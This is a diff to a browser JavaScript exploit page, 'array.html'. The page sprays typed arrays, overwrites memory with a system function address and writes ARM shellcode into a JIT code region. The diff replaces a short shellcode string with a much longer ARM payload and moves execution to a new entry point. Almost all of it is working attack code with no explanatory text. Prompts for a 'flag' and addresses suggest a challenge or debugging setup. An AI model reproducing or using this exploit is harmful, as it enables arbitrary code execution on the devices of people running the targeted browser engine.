--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start66");
+alert("start666");
 var flag=prompt("flag");
 if(flag!=0){
  
@@ -175,16 +175,49 @@ spray[spray_index][typedarray_index+0x100/4]=system_addr;
 var jit_index=typedarray_index+0x38/4;
 var typedarray=spray[spray_index];
 var myarr=arrcvs[0];
-var shellcode="\x04\xB0\x2D\xE5\x00\xB0\x8D\xE2\x1C\xD0\x4D\xE2\x18\x00\x0B\xE5\
-\x1C\x10\x0B\xE5\x00\x30\xA0\xE3\x08\x30\x0B\xE5\x28\x40\x14\xE5\
-\x06\x30\xA0\xE3\x03\x00\xA0\xE1\x00\xD0\x8B\xE2\x00\x08\xBD\xE8\
-\x1E\xFF\x2F\xE1";
+var shellcode="\x10\x40\x2D\xE9\x1D\x00\x00\xEB\x10\x40\xBD\xE8\x1E\xFF\x2F\xE1\
+\x04\xE0\x2D\xE5\x04\xE0\x9F\xE5\x00\x00\xA0\xE1\x08\xF0\xBE\xE5\
+\x00\x10\x01\x00\x00\xC6\x8F\xE2\x08\xCA\x8C\xE2\x2C\xFD\xBC\xE5\
+\x00\xC6\x8F\xE2\x08\xCA\x8C\xE2\x24\xFD\xBC\xE5\x00\xC6\x8F\xE2\
+\x08\xCA\x8C\xE2\x1C\xFD\xBC\xE5\x24\xC0\x9F\xE5\x00\xB0\xA0\xE3\
+\x04\x10\x9D\xE4\x0D\x20\xA0\xE1\x04\x20\x2D\xE5\x04\x00\x2D\xE5\
+\x10\x00\x9F\xE5\x10\x30\x9F\xE5\x04\xC0\x2D\xE5\xEF\xFF\xFF\xEB\
+\xEB\xFF\xFF\xEB\xE4\x83\x00\x00\xB0\x83\x00\x00\xE8\x83\x00\x00\
+\x1C\x30\x9F\xE5\x1C\x20\x9F\xE5\x03\x30\x8F\xE0\x02\x20\x93\xE7\
+\x10\x40\x2D\xE9\x00\x00\x52\xE3\xE7\xFF\xFF\x1B\x10\x40\xBD\xE8\
+\x1E\xFF\x2F\xE1\xBC\x8C\x00\x00\x18\x00\x00\x00\x10\x30\x9F\xE5\
+\x00\x20\xD3\xE5\x00\x00\x52\xE3\x01\x20\x82\x02\x00\x20\xC3\x05\
+\x1E\xFF\x2F\xE1\x2C\x10\x01\x00\x24\x00\x9F\xE5\x10\x40\x2D\xE9\
+\x00\x30\x90\xE5\x00\x00\x53\xE3\x03\x00\x00\x0A\x14\x30\x9F\xE5\
+\x00\x00\x53\xE3\x0F\xE0\xA0\x11\x13\xFF\x2F\x11\x10\x40\xBD\xE8\
+\x1E\xFF\x2F\xE1\x0C\x0F\x01\x00\x00\x00\x00\x00\x04\xB0\x2D\xE5\
+\x00\xB0\x8D\xE2\x1C\xD0\x4D\xE2\x18\x00\x0B\xE5\x1C\x10\x0B\xE5\
+\x00\x30\xA0\xE3\x08\x30\x0B\xE5\x28\x40\x14\xE5\x06\x30\xA0\xE3\
+\x03\x00\xA0\xE1\x00\xD0\x8B\xE2\x00\x08\xBD\xE8\x1E\xFF\x2F\xE1\
+\x1E\xFF\x2F\xE1\xF0\x47\x2D\xE9\x58\xA0\x9F\xE5\x58\x50\x9F\xE5\
+\x00\x60\xA0\xE1\x01\x70\xA0\xE1\x02\x80\xA0\xE1\xAB\xFF\xFF\xEB\
+\x48\x30\x9F\xE5\x05\x50\x6A\xE0\x03\x30\x8F\xE0\x45\x51\xB0\xE1\
+\x0A\xA0\x83\xE0\x09\x00\x00\x0A\x00\x40\xA0\xE3\x06\x00\xA0\xE1\
+\x07\x10\xA0\xE1\x08\x20\xA0\xE1\x04\xC1\x9A\xE7\x0F\xE0\xA0\xE1\
+\x1C\xFF\x2F\xE1\x01\x40\x84\xE2\x05\x00\x54\xE1\xF6\xFF\xFF\x3A\
+\xF0\x47\xBD\xE8\x1E\xFF\x2F\xE1\x04\xFF\xFF\xFF\x08\xFF\xFF\xFF\
+\xEC\x8B\x00\x00\x10\x40\x2D\xE9\x10\x40\xBD\xE8\x1E\xFF\x2F\xE1\
+\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
+\x7C\x83\x00\x00\x60\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
+\x10\x0F\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3C\x10\x01\x00\
+\x38\x10\x01\x00\x40\x10\x01\x00\x40\x10\x01\x00\x00\x00\x00\x00\
+\x00\x00\x00\x00\x11\x11\x11\x11\x22\x22\x22\x22\x00\x00\x00\x00\
+\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
+\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
+\x2C\x10\x01\x00\x70\x84\x00\x00\x30\x10\x01\x00\x30\x10\x01\x00\
+\x2C\x10\x01\x00\x30\x10\x01\x00\x30\x10\x01\x00\x2C\x10\x01\x00\
+\x68\x84\x00\x00";
 for(var i=0;i<shellcode.length;i++){
  myarr[0]=shellcode.charCodeAt(i);
  typedarray[jit_index]+=1;
 }
  spray[spray_index][typedarray_index+0x38/4]=p_addr+0x10-0x18;
- myarr[0]=jitcode_addr;
+ myarr[0]=jitcode_addr+0xfc;//new entry point
 while(1){
 a=prompt("addr");
 b="";
